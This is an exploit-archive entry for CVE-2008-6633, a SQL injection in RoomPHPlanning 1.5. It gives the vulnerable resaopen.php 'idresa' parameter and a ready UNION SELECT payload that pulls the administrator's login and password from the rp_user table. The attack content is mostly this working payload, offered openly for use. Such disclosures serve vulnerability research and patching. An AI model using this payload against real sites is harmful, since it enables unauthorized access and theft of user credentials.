RoomPHPlanning 1.5 - 'idresa' SQL Injection

Author: His0k4
type: webapps
platform: php
port: 
date_added: 2008-05-23 
date_updated: 2016-11-30 
verified: 1 
codes: OSVDB-45604;CVE-2008-6633 
tags: 
aliases:  
screenshot_url:  
application_url: 

###########################################
{+} RoomPHPlanning v1.5 remote SQL injection exploit
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
{+} Exploit :
    http://localhost/[script_path]/resaopen.php?idresa={SQL}
{+} Example :
    http://localhost/[script_path]/resaopen.php?idresa=-1 UNION SELECT 1,2,3,4,5,6,concat(LoginUs,0x3a,PwdUs),8,9 FROM rp_user where IdUs=1--
############################################

# milw0rm.com [2008-05-24]